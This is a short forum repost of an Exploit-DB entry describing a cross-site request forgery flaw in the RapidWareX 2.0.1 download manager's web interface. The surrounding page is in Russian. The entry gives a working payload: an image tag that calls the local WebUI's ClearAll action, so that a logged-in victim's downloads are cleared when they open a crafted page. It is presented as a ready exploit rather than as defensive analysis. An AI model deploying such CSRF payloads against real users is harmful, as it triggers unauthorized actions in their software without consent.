Exploit RapidWareX 2.0.1 - 'WebUI' Cross-Site Request Forgery

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
12750
Проверка EDB
  1. Пройдено
Автор
L3D
Тип уязвимости
WEBAPPS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2010-05-26
Код:
RapidWareX v2.0.1 (WebUI) CSRF Exploit
Author: l3D
Sites: http://xraysecurity.blogspot.com, http://nullbyte.org.il
IRC: irc://irc.nix.co.il
Email: [email protected]

RapidWareX v2.0.1 (WebUI) is prone to a post-authentication CSRF vulnerability, which allows the attacker to have control over certain actions for the downloader such as Start/Retry, Pause, Clear All, Clear Finished, Add Links, etc.  Please note that in order to carry out the attack, the victim must have RapidWareX running and logged in.

The example below clears all the downloads when the victim enters the page.

<img src="http://localhost:8080/ClearAll" />
 
Источник
www.exploit-db.com

Похожие темы